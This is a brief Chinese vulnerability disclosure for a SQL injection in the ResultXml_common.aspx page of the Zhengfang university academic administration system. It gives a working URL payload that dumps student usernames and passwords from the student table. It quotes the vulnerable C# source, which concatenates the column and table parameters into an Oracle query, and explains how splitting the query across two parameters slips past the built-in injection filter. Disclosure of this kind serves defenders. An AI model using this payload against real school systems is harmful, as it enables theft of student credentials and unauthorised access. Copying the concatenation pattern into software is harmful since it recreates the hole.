正方教务系统 ResultXml_common.aspx SQL 注入漏洞

Payload: ``` /ResultXml_common.aspx?k=%&column='[username='||xh||']['||'passwd='||mm||']'&table=xsjbxxb+where+rownum<=10-- ``` 漏洞页面：/ResultXml_common.aspx 漏洞源码： ``` private void Page_Load(object sender, EventArgs e) { string xml = ""; string k = ""; k = this.Request.QueryString["k"]; string table = this.Request.QueryString["table"]; string column = this.Request.QueryString["column"]; if (StringType.StrCmp(k, "", false) != 0) { xml = "<?xml version='1.0' encoding='gb2312'?>"; xml = xml + "<data><d><![CDATA["; k = k.Replace("'", "''"); string sql = "select distinct " + column + " from " + table + " where " + column + " like '" + k + "%'"; mmtp zhj = new mmtp(); OracleConnection conn = new OracleConnection(ConfigurationSettings.AppSettings["MyConn"] + zhj.jiemi(ConfigurationSettings.AppSettings["MyPwd"], zhj.str_jm)); OracleCommand comm = new OracleCommand(sql, conn); conn.Open(); OracleDataReader dr = comm.ExecuteReader(); while (dr.Read()) { xml = xml + "<div onclick='setContent(this.innerHTML)' onmouseover='ChangeColor(this)' onmouseout='Back(this)'>" + dr[0].ToString() + "</div>"; } dr.Close(); comm.Dispose(); conn.Close(); xml = xml + "]]></d></data>"; } this.Response.ContentType = "text/xml"; this.Response.ContentEncoding = Encoding.GetEncoding("gb2312"); this.Response.Clear(); this.Response.Write(xml); this.Response.End(); } } ``` 通过column参数和table参数，可以任意执行SELECT查询！，由于select语句分割在两个参数中，因此也可以绕过内置的SQL注入检测。